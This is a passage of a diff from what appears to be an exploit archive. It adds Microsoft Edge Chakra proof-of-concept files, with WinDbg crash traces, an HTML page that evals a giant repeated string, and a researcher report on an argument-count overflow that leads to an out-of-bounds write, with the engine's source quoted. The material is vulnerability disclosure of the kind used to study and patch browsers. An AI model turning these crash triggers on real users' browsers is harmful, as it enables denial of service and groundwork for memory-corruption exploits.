+ r8=0000023d22d81000  r9=0000023d330e4fc8 r10=000000005555462c
+r11=0000023d22d80030 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=000000bb058fbd00
+iopl=0         nv up ei pl nz na pe nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010200
+chakra!utf8::EncodeIntoImpl<1>+0xb5:
+00007ffc`dbdb69e5 418910          mov     dword ptr [r8],edx ds:0000023d`22d81000=????????
+0:016> !address r8
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\vm3dum64.dll - 
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\System32\ole32.dll - 
+
+                                     
+Usage:                  <unclassified>
+Allocation Base:        0000023d`22d80000
+Base Address:           0000023d`22d81000
+End Address:            0000023d`22d85000
+Region Size:            00000000`00004000
+Type:                   00020000	MEM_PRIVATE
+State:                  00002000	MEM_RESERVE
+Protect:                00000000	
+
+0:016> !address r8-1
+Usage:                  <unclassified>
+Allocation Base:        0000023d`22d80000
+Base Address:           0000023d`22d80000
+End Address:            0000023d`22d81000
+Region Size:            00000000`00001000
+Type:                   00020000	MEM_PRIVATE
+State:                  00001000	MEM_COMMIT
+Protect:                00000004	PAGE_READWRITE
+
+0:016> db 23d`22d80000
+0000023d`22d80000  01 00 00 00 00 00 00 00-80 77 93 1f 3d 02 00 00  .........w..=...
+0000023d`22d80010  00 00 00 00 00 00 00 00-d0 0f 00 00 00 00 00 00  ................
+0000023d`22d80020  00 00 d8 22 3d 02 00 00-00 00 00 00 00 00 00 00  ..."=...........
+0000023d`22d80030  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80040  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80050  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80060  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80070  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0:016> kb
+RetAddr           : Args to Child                                                           : Call Site
+00007ffc`dbbf2611 : 0000023d`22d80030 0000023d`330e3020 00000000`55555600 00000235`00000004 : chakra!utf8::EncodeIntoImpl<1>+0xb5
+00007ffc`dbb98201 : 0000023d`1f937b60 0000023d`330e3020 0000023d`55555600 000000bb`00000000 : chakra!Js::GlobalObject::DefaultEvalHelper+0x171
+00007ffc`dbb97fb8 : 0000023d`22de0000 00007ffc`dc2c9f80 0000023d`00000000 0000023d`22ddc000 : chakra!Js::GlobalObject::VEval+0x231
+00007ffc`dbb97ecd : 000000bb`058fbd40 0000023d`22ddb5c0 0000023d`1f934ba0 000000bb`058fbd00 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
+00007ffc`dbdf6be3 : 0000023d`22ddb5c0 00000000`18000003 0000023d`22df0020 0000023d`22df9460 : chakra!Js::GlobalObject::EntryEval+0x7d
+00007ffc`dbce6bf3 : 0000023d`1f934ba0 00000000`00000018 000000bb`058fbde8 0000023d`22ddc000 : chakra!amd64_CallFunction+0x93
+00007ffc`dbba71ac : 0000023d`22ddb5c0 00007ffc`dbb97e50 000000bb`058fbe10 000000bb`058fbfa0 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
+00007ffc`dbba77b4 : 000000bb`058fbfa0 0000023d`22ecc053 0000023d`22ddb5c0 00007ffc`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
+00007ffc`dbc84920 : 000000bb`058fbfa0 0000023d`22ecc053 0000023d`058fbfa0 0000023d`22ecc061 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
+00007ffc`dbc7ff2c : 000000bb`058fbfa0 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
+00007ffc`dbd180cc : 000000bb`058fbfa0 0000023d`33040000 000000bb`058fc150 00000000`00000001 : chakra!Js::InterpreterStackFrame::Process+0x12c
+00007ffc`dbd17be1 : 0000023d`22e00420 000000bb`058fc330 0000023d`33060fc2 000000bb`058fc348 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
+0000023d`33060fc2 : 000000bb`058fc380 00000000`00000000 00000000`00000000 00007ffc`dbdf6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
+00007ffc`dbdf6be3 : 0000023d`22e00420 00000000`00000000 00000000`00000000 00000000`00000000 : 0x23d`33060fc2
+00007ffc`dbce6bf3 : 0000023d`1f934ba0 00000000`00000000 0000023d`1f940c90 00007ffc`dbcfa837 : chakra!amd64_CallFunction+0x93
+00007ffc`dbd11810 : 0000023d`22e00420 00007ffc`dbdf6df0 000000bb`058fc480 0000023d`1f937b60 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
+00007ffc`dbd10a37 : 0000023d`22e00420 000000bb`058fc570 0000023d`1f937b60 00007ffc`fc027100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
+00007ffc`dbdd907e : 0000023d`22e00420 000000bb`058fc5d0 0000023d`1f937b60 0000023d`1f943000 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
+00007ffc`dbd3cd54 : 0000023d`22e00420 000000bb`058fc610 00000000`00000000 000000bb`058fc628 : chakra!ScriptSite::CallRootFunction+0x6a
+00007ffc`dbcd1b49 : 0000023d`1f937a50 0000023d`22e00420 000000bb`058fc6c0 00000000`00000000 : chakra!ScriptSite::Execute+0x124
+00007ffc`dbcd2e8e : 0000023d`1f934750 000000bb`058fcbc8 000000bb`058fcc00 000000bb`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
+00007ffc`dbcd3121 : 0000023d`1f934750 0000023d`2101f5c4 00000000`00000000 00000235`1f594330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
+00007ffc`dcac3c75 : 0000023d`1f9347a0 0000023d`2101f5c4 00000235`00000042 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
+00007ffc`dcac3abe : 00000000`00000000 000000bb`058fca99 00000235`1f594260 00000235`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
+00007ffc`dcac35d7 : 00000000`00000000 00000235`1f594260 00000235`1f51c1c0 00000235`1f5941b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
+00007ffc`dcac2f07 : 00000235`1f530c01 00000235`1f58c100 00000235`00000082 00007ffc`00000000 : edgehtml!CScriptData::CommitCode+0x357
+00007ffc`dcb82f8d : 00000000`ffffffff 00000235`1f51c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
+00007ffc`dc9c43d4 : 00000000`00000000 00000235`1f56c440 00000000`00000001 00007ffc`dcb7ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
+00007ffc`dc9c34a1 : 00000235`1f530c00 00000000`00000000 00000235`1f530c00 00000235`1f50c8c0 : edgehtml!CHtmParseBase::Execute+0x204
+00007ffc`dcb7d23b : 00000000`04cd60c0 00000235`1f500000 00000235`1f5600b0 00000235`1f50c8c0 : edgehtml!CHtmPost::Exec+0x1e1
+00007ffc`dcb7d11f : 00000235`1f50c8c0 00000000`04cd60c0 0000023d`203725a0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
+00007ffc`dcb7cfd3 : 00000235`1f500000 00000012`c245be01 00000000`00000002 00000235`1f541680 : edgehtml!PostManExecute+0x63
+00007ffc`dcb7ce6d : 00000235`1f50c8c0 00000012`c245be61 0000023d`00000000 00007ffc`eff34779 : edgehtml!PostManResume+0xa3
+00007ffc`dcb8b353 : 00000235`1f528600 0000023d`20350350 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
+00007ffc`dcb650db : 00000235`1f5082d0 0000023d`1f927e73 0000023d`1f902200 000000bb`058fd150 : edgehtml!CDwnChan::OnMethodCall+0x23
+00007ffc`dc9f1706 : 0000023d`1f902728 00000235`1f541680 0000023d`1f902260 000000bb`058fd180 : edgehtml!GWndAsyncTask::Run+0x1b
+00007ffc`dcb3a860 : 0000002b`dd92f8c0 00000235`1f5416e0 00000235`1f5600b0 00007ffc`dca99138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
+00007ffc`dcb3a683 : 0000023d`20350350 00000000`00000000 00000000`00000002 00000235`1f508170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
+00007ffc`dc9f22b3 : 000000bb`058fd630 00000000`00008002 00000235`1f508170 00007ffc`fade47df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
+00007ffc`dc9f07a5 : 00000000`00008002 00000235`1f500000 0000d687`35232df0 00000000`00000002 : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
+00007ffc`fadcbc50 : 00000000`001b029a 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
+00007ffc`fadcb5cf : 00000235`1de0b5c0 00007ffc`dc9f0680 00000000`001b029a 00000000`001b029a : USER32!UserCallWinProcCheckWow+0x280
+00007ffc`dae36d0e : 000000bb`058fd5d0 00000000`00000000 0000023d`2030b260 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
+00007ffc`dae4eecb : 00000000`00000000 00000000`00000001 00000235`1d929e40 00000235`1d8d4af0 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
+00007ffc`e85eb4a8 : 00000000`00000000 00000235`1d928f50 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
+00007ffc`fb9e2774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
+00007ffc`fc0d0d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
+00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
+0:016> db r8 l-100
+0000023d`22d80f00  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80f10  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80f20  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80f30  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80f40  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80f50  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80f60  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80f70  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80f80  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80f90  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80fa0  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80fb0  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80fc0  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80fd0  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80fe0  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0000023d`22d80ff0  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0:016> r
+rax=0000000000000061 rbx=000000bb058fb4f0 rcx=0000000000006100
+rdx=0000000061616161 rsi=0000000000000002 rdi=000000bb058fb000
+rip=00007ffcdbdb69e5 rsp=000000bb058fb700 rbp=0000023d1f937b60
+ r8=0000023d22d81000  r9=0000023d330e4fc8 r10=000000005555462c
+r11=0000023d22d80030 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=000000bb058fbd00
+iopl=0         nv up ei pl nz na pe nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010200
+chakra!utf8::EncodeIntoImpl<1>+0xb5:
+00007ffc`dbdb69e5 418910          mov     dword ptr [r8],edx ds:0000023d`22d81000=????????
+
+-->
+
+<html>
+<head>
+<title> POC </title>
+</head>
+<script>
+	//alert('');
+	var code = 'a'.repeat(0x55555600);
+	eval(code);
+</script>
+</html>
\ No newline at end of file
diff --git a/platforms/windows/dos/42466.html b/platforms/windows/dos/42466.html
new file mode 100755
index 000000000..a34160fb2
--- /dev/null
+++ b/platforms/windows/dos/42466.html
@@ -0,0 +1,867 @@
+<!--
+Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team
+
+There is an overflow when constructoring a new object with arguments which has 0xffff elements in Chakra!
+This issue can be reproduced steadly in uptodate Edge in Win10 WIP.
+
+//ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
+void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
+{
+    Js::ArgSlot argCount = pnode->sxCall.argCount;			//pnode->sxCall.argCount=0xFFFF
+    argCount++; // include "this"							//overflow!!!! argCount==0
+
+    BOOL fSideEffectArgs = FALSE;
+    unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
+    Assert(argCount == tmpCount);
+
+    if (argCount != (Js::ArgSlot)argCount)
+    {
+        Js::Throw::OutOfMemory();
+    }
+
+    byteCodeGenerator->StartStatement(pnode);
+
+    // Start call, allocate out param space
+    funcInfo->StartRecordingOutArgs(argCount);
+
+    // Assign the call target operand(s), putting them into expression temps if necessary to protect
+    // them from side-effects.
+    if (fSideEffectArgs)
+    {
+        SaveOpndValue(pnode->sxCall.pnodeTarget, funcInfo);
+    }
+
+    if (pnode->sxCall.pnodeTarget->nop == knopSuper)
+    {
+        EmitSuperFieldPatch(funcInfo, pnode, byteCodeGenerator);
+    }
+
+    Emit(pnode->sxCall.pnodeTarget, byteCodeGenerator, funcInfo, false, true);
+
+    if (pnode->sxCall.pnodeArgs == nullptr)
+    {
+        funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
+        Js::OpCode op = (CreateNativeArrays(byteCodeGenerator, funcInfo)
+            && CallTargetIsArray(pnode->sxCall.pnodeTarget))
+            ? Js::OpCode::NewScObjArray : Js::OpCode::NewScObject;
+        Assert(argCount == 1);
+
+        Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);
+        byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);
+        byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode),
+            pnode->sxCall.pnodeTarget->location, argCount, callSiteId);
+    }
+    else
+    {
+        byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);
+        uint32 actualArgCount = 0;
+
+        if (IsCallOfConstants(pnode))
+        {
+            funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
+            actualArgCount = EmitNewObjectOfConstants(pnode, byteCodeGenerator, funcInfo, argCount);
+        }
+        else
+        {
+            Js::OpCode op;
+            if ((CreateNativeArrays(byteCodeGenerator, funcInfo) && CallTargetIsArray(pnode->sxCall.pnodeTarget)))
+            {
+                op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjArraySpread : Js::OpCode::NewScObjArray;
+            }
+            else
+            {
+                op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjectSpread : Js::OpCode::NewScObject;
+            }
+
+            Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);
+
+
+            Js::AuxArray<uint32> *spreadIndices = nullptr;
+            actualArgCount = EmitArgList(pnode->sxCall.pnodeArgs, Js::Constants::NoRegister, Js::Constants::NoRegister, Js::Constants::NoRegister,
+                false, true, byteCodeGenerator, funcInfo, callSiteId, pnode->sxCall.spreadArgCount, &spreadIndices);
+            funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
+
+
+            if (pnode->sxCall.spreadArgCount > 0)
+            {
+                Assert(spreadIndices != nullptr);
+                uint spreadExtraAlloc = spreadIndices->count * sizeof(uint32);
+                uint spreadIndicesSize = sizeof(*spreadIndices) + spreadExtraAlloc;
+                byteCodeGenerator->Writer()->CallIExtended(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location,
+                    (uint16)actualArgCount, Js::CallIExtended_SpreadArgs,
+                    spreadIndices, spreadIndicesSize, callSiteId);
+            }
+            else
+            {
+                byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location,
+                    (uint16)actualArgCount, callSiteId);
+            }
+        }
+
+        Assert(argCount == actualArgCount);
+    }
+
+    // End call, pop param space
+    funcInfo->EndRecordingOutArgs(argCount);
+    return;
+}
+
+//ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
+inline void InterpreterStackFrame::SetOut(ArgSlot_OneByte outRegisterID, Var aValue)
+{
+	Assert(m_outParams + outRegisterID < m_outSp);		
+	m_outParams[outRegisterID] = aValue;				//OOB Write!!!! outRegisterID could be 0~0xFFFF, but m_outParams has one element only 
+}
+
+//ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
+    Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)
+    {
+
+#ifdef ENABLE_DEBUG_CONFIG_OPTIONS
+        // Support for simulating partially initialized interpreter stack frame.
+        InterpreterThunkStackCountTracker tracker;
+
+        if (CONFIG_ISENABLED(InjectPartiallyInitializedInterpreterFrameErrorFlag) &&
+            CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameError) == InterpreterThunkStackCountTracker::GetCount())
+        {
+            switch (CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameErrorType))
+            {
+            case 0:
+                DebugBreak();
+                break;
+            case 1:
+                Js::JavascriptError::MapAndThrowError(function->GetScriptContext(), VBSERR_InternalError);
+                break;
+            default:
+                DebugBreak();
+            }
+        }
+#endif
+        ScriptContext* functionScriptContext = function->GetScriptContext();
+        ThreadContext * threadContext = functionScriptContext->GetThreadContext();
+        Assert(!threadContext->IsDisableImplicitException());
+        functionScriptContext->VerifyAlive(!function->IsExternal());
+        Assert(threadContext->IsScriptActive());
+        Assert(threadContext->IsInScript());
+
+        FunctionBody* executeFunction = JavascriptFunction::FromVar(function)->GetFunctionBody();
+#ifdef ENABLE_DEBUG_CONFIG_OPTIONS
+        if (!isAsmJs && executeFunction->IsInDebugMode() != functionScriptContext->IsScriptContextInDebugMode()) // debug mode mismatch
+        {
+            if (executeFunction->GetUtf8SourceInfo()->GetIsLibraryCode())
+            {
+                Assert(!executeFunction->IsInDebugMode()); // Library script byteCode is never in debug mode
+            }
+            else
+            {
+                Throw::FatalInternalError();
+            }
+        }
+#endif
+
+        if (executeFunction->GetInterpretedCount() == 0)
+        {
+            executeFunction->TraceInterpreterExecutionMode();
+        }
+
+
+        class AutoRestore
+        {
+        private:
+            ThreadContext *const threadContext;
+            const uint8 savedLoopDepth;
+
+        public:
+            AutoRestore(ThreadContext *const threadContext, FunctionBody *const executeFunction)
+                : threadContext(threadContext),
+                savedLoopDepth(threadContext->LoopDepth())
+            {
+                if (savedLoopDepth != 0 && !executeFunction->GetIsAsmJsFunction())
+                {
+                    executeFunction->SetWasCalledFromLoop();
+                }
+            }
+
+            ~AutoRestore()
+            {
+                threadContext->SetLoopDepth(savedLoopDepth);
+            }
+        } autoRestore(threadContext, executeFunction);
+
+#if ENABLE_PROFILE_INFO
+        DynamicProfileInfo * dynamicProfileInfo = nullptr;
+        const bool doProfile = executeFunction->GetInterpreterExecutionMode(false) == ExecutionMode::ProfilingInterpreter ||
+                               (executeFunction->IsInDebugMode() && DynamicProfileInfo::IsEnabled(executeFunction));
+        if (doProfile)
+        {
+#if !DYNAMIC_INTERPRETER_THUNK
+            executeFunction->EnsureDynamicProfileInfo();
+#endif
+            dynamicProfileInfo = executeFunction->GetDynamicProfileInfo();
+            threadContext->ClearImplicitCallFlags();
+        }
+#else
+        const bool doProfile = false;
+#endif
+
+        executeFunction->IncreaseInterpretedCount();
+#ifdef BGJIT_STATS
+        functionScriptContext->interpretedCount++;
+        functionScriptContext->maxFuncInterpret = max(functionScriptContext->maxFuncInterpret, executeFunction->GetInterpretedCount());
+#endif
+
+        AssertMsg(!executeFunction->IsDeferredParseFunction(),
+            "Non-intrinsic functions must provide byte-code to execute");
+
+        executeFunction->BeginExecution();
+
+        bool fReleaseAlloc = false;
+        InterpreterStackFrame* newInstance = nullptr;
+        Var* allocation = nullptr;
+
+        if (!isAsmJs && executeFunction->IsCoroutine())
+        {
+            // If the FunctionBody is a generator then this call is being made by one of the three
+            // generator resuming methods: next(), throw(), or return().  They all pass the generator
+            // object as the first of two arguments.  The real user arguments are obtained from the
+            // generator object.  The second argument is the ResumeYieldData which is only needed
+            // when resuming a generator and so it only used here if a frame already exists on the
+            // generator object.
+            AssertMsg(args.Info.Count == 2, "Generator ScriptFunctions should only be invoked by generator APIs with the pair of arguments they pass in -- the generator object and a ResumeYieldData pointer");
+            JavascriptGenerator* generator = JavascriptGenerator::FromVar(args[0]);
+            newInstance = generator->GetFrame();
+
+            if (newInstance != nullptr)
+            {
+                ResumeYieldData* resumeYieldData = static_cast<ResumeYieldData*>(args[1]);
+                newInstance->SetNonVarReg(executeFunction->GetYieldRegister(), resumeYieldData);
+
+                // The debugger relies on comparing stack addresses of frames to decide when a step_out is complete so
+                // give the InterpreterStackFrame a legit enough stack address to make this comparison work.
+                newInstance->m_stackAddress = reinterpret_cast<DWORD_PTR>(&generator);
+            }
+            else
+            {
+                //
+                // Allocate a new InterpreterStackFrame instance on the recycler heap.
+                // It will live with the JavascriptGenerator object.
+                //
+                Arguments generatorArgs = generator->GetArguments();
+                InterpreterStackFrame::Setup setup(function, generatorArgs);
+                size_t varAllocCount = setup.GetAllocationVarCount();
+                size_t varSizeInBytes = varAllocCount * sizeof(Var);
+                DWORD_PTR stackAddr = reinterpret_cast<DWORD_PTR>(&generator); // as mentioned above, use any stack address from this frame to ensure correct debugging functionality
+                Var loopHeaderArray = executeFunction->GetHasAllocatedLoopHeaders() ? executeFunction->GetLoopHeaderArrayPtr() : nullptr;
+
+                allocation = RecyclerNewPlus(functionScriptContext->GetRecycler(), varSizeInBytes, Var);
+                AnalysisAssert(allocation);
+#if DBG
+                // Allocate invalidVar on GC instead of stack since this InterpreterStackFrame will out live the current real frame
+                Js::RecyclableObject* invalidVar = (Js::RecyclableObject*)RecyclerNewPlusLeaf(functionScriptContext->GetRecycler(), sizeof(Js::RecyclableObject), Var);
+                AnalysisAssert(invalidVar);
+                memset(reinterpret_cast<void*>(invalidVar), 0xFE, sizeof(Js::RecyclableObject));
+                newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr, invalidVar);
+#else
+                newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr);
+#endif
+
+                newInstance->m_reader.Create(executeFunction);
+
+                generator->SetFrame(newInstance, varSizeInBytes);
+            }
+        }
+        else
+        {
+            InterpreterStackFrame::Setup setup(function, args);
+            size_t varAllocCount = setup.GetAllocationVarCount();
+            size_t varSizeInBytes = varAllocCount * sizeof(Var);
+
+            //
+            // Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.
+            //
+            DWORD_PTR stackAddr;
+
+            // If the locals area exceeds a certain limit, allocate it from a private arena rather than
+            // this frame. The current limit is based on an old assert on the number of locals we would allow here.
+            if (varAllocCount > InterpreterStackFrame::LocalsThreshold)
+            {
+                ArenaAllocator *tmpAlloc = nullptr;
+                fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);
+                allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);
+                stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)
+            }
+            else
+            {
+                PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);
+                allocation = (Var*)_alloca(varSizeInBytes);
+#if DBG
+                memset(allocation, 0xFE, varSizeInBytes);
+#endif
+                stackAddr = reinterpret_cast<DWORD_PTR>(allocation);
+            }
+
+            /*
+            * If the function has any loop headers, we allocate an array for the loop headers wrappers, and
+            * reference the wrappers in the array. We then push the pointer to the array onto the stack itself.
+            * We do this so that while the function is being interpreted, we don't want the jitted loop
+            * bodies to be collected, even if the loop body isn't being executed. The loop body will
+            * get collected when the function has been JITted, and when the function exits the interpreter.
+            * The array contains nulls if the loop body isn't jitted (or hasn't been jitted yet) but
+            * it's cheaper to just copy them all into the recycler array rather than just the ones that
+            * have been jitted.
+            */
+            Var loopHeaderArray = nullptr;
+
+            if (executeFunction->GetHasAllocatedLoopHeaders())
+            {
+                // Loop header array is recycler allocated, so we push it on the stack
+                // When we scan the stack, we'll recognize it as a recycler allocated
+                // object, and mark it's contents and keep the individual loop header
+                // wrappers alive
+                loopHeaderArray = executeFunction->GetLoopHeaderArrayPtr();
+            }
+
+#if DBG
+            Js::RecyclableObject * invalidStackVar = (Js::RecyclableObject*)_alloca(sizeof(Js::RecyclableObject));
+            memset(reinterpret_cast<void*>(invalidStackVar), 0xFE, sizeof(Js::RecyclableObject));
+            newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr, invalidStackVar);
+#else
+            newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr);
+#endif
+
+            newInstance->m_reader.Create(executeFunction);
+        }
+        //
+        // Execute the function's byte-code, returning the return-value:
+        // - Mark that the function is current executing and may not be modified.
+        //
+
+#if ENABLE_TTD
+        TTD::TTDExceptionFramePopper exceptionFramePopper;
+        if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext))
+        {
+            bool isInFinally = ((newInstance->m_flags & Js::InterpreterStackFrameFlags_WithinFinallyBlock) == Js::InterpreterStackFrameFlags_WithinFinallyBlock);
+
+            threadContext->TTDExecutionInfo->PushCallEvent(function, args.Info.Count, args.Values, isInFinally);
+            exceptionFramePopper.PushInfo(threadContext->TTDExecutionInfo, function);
+        }
+#endif
+
+        Var aReturn = nullptr;
+
+        {
+            if (!isAsmJs && executeFunction->IsInDebugMode())
+            {
+#if DYNAMIC_INTERPRETER_THUNK
+                PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress);
+                aReturn = newInstance->DebugProcess();
+#else
+                aReturn = newInstance->DebugProcessThunk(_ReturnAddress(), _AddressOfReturnAddress());
+#endif
+            }
+            else
+            {
+#if DYNAMIC_INTERPRETER_THUNK
+                PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress);
+                aReturn = newInstance->Process();
+#else
+                aReturn = newInstance->ProcessThunk(_ReturnAddress(), _AddressOfReturnAddress());
+#endif
+            }
+        }
+
+        executeFunction->EndExecution();
+
+#if ENABLE_TTD
+        if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext))
+        {
+            exceptionFramePopper.PopInfo();
+            threadContext->TTDExecutionInfo->PopCallEvent(function, aReturn);
+        }
+#endif
+
+        if (fReleaseAlloc)
+        {
+            functionScriptContext->ReleaseInterpreterArena();
+        }
+
+#if ENABLE_PROFILE_INFO
+        if (doProfile)
+        {
+            dynamicProfileInfo->RecordImplicitCallFlags(threadContext->GetImplicitCallFlags());
+        }
+#endif
+
+        if (isAsmJs)
+        {
+            return newInstance;
+        }
+        return aReturn;
+    }
+
+	
+Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
+Copyright (c) Microsoft Corporation. All rights reserved.
+
+*** wait with pending attach
+Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
+Executable search path is: 
+ModLoad: 00007ff6`1e3c0000 00007ff6`1e3e5000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
+ModLoad: 00007ffe`a1ea0000 00007ffe`a207b000   C:\Windows\SYSTEM32\ntdll.dll
+ModLoad: 00007ffe`a0a70000 00007ffe`a0b1e000   C:\Windows\System32\KERNEL32.DLL
+ModLoad: 00007ffe`9e590000 00007ffe`9e7d9000   C:\Windows\System32\KERNELBASE.dll
+ModLoad: 00007ffe`9c900000 00007ffe`9c97e000   C:\Windows\SYSTEM32\apphelp.dll
+ModLoad: 00007ffe`a0ee0000 00007ffe`a11d9000   C:\Windows\System32\combase.dll
+ModLoad: 00007ffe`9e7e0000 00007ffe`9e8d6000   C:\Windows\System32\ucrtbase.dll
